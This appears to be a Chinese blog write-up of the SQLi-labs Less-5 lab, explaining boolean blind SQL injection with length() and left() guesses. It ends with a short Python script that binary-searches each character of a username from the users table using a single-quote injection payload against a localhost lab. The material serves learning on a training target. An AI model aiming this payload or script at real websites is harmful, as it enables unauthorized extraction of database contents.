开始写SQL的题,单引号等特殊符号闭合漏洞比较简单,因此从Less-5开始写。
布尔盲注是多种盲注的一种,这种盲注方法也比较好理解。但使用这种盲注有一个前提,就是网页会有回显,透过这个回显,我们可以通过判断,来获得所需的信息。
以Less-5为例题,如图所示:
加上id=1,会发现这样的回显,如图所示:
然后利用Less-1~4的知识,发现这里的语句使用单引号闭合的,并且用联合查询语句会依然回显“You are in......”。因此,简单的联合查询语句是行不通的。
由于存在单引号闭合漏洞,我们可以使用and并且结合相关的语句对数据库信息进行猜测。
首先得得出数据库长度,利用length()函数,payload如下:
然后这里发现该语句没有回显,如图所示:
长度不为5,再通过多次尝试,爆出数据库名长度为8,如图所示:
知道了库名长度后,再使用left()函数进行注入。先说一下left()函数,该函数有两个参数,第一参数是需要进行截取的字符串对象,第二个参数是该字符串从左到右的第几个字符。payload如下图所示:
通过一个个的尝试,会发现当left(database(),1)='s'时,回显正常。因此数据库的第一个字符为s,接下来的数据如法炮制。
当然,如果这样一个个的尝试,犹如大海捞针,因此我们通常使用脚本进行注入。这里使用了二分法,代码如下图所示:
# -*-coding:utf8-*- import requests url = "http://localhost:81/SQLI-LABS/sqli-labs-master/Less-5/?id=1%s" payload = "' and ord(mid((select username from users limit 0,1),%s,1))>%s --+" result ='' print "start to get the result: " for i in range(1, 20): max = 122 #z min = 65 #A while abs(max-min)>1: mid = int((max+min)/2) p = payload % (str(i), str(mid)) response = requests.get(url % p) if response.content.find("You are in") != -1: min = mid else: max = mid result = result+chr(max) print ("the result is %s" % result)
需要注意的是,这里的%s是字符串占位符,代表一个字符串对象,可以放置不同的字符串。
最终通过脚本获得flag。